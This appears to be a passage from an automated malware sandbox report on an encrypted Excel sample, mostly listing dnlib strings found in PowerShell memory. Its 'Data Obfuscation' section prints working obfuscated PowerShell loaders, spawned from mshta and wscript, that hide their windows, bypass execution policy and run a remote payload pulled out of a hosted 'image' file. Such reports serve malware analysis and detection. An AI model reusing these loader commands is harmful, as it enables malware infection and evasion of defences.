                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001E.00000002.524728452.000000001295E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001E.00000002.524728452.000000001295E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdb source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdb source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.pdbhP\ source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmp
                  Source: 7D330000.0.dr Initial sample: OLE indicators vbamacros = False
                  Source: 037002451082_10142024.xls Initial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B022D push eax; iretd 5_2_000007FE899B0241
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B00BD pushad ; iretd 5_2_000007FE899B00C1
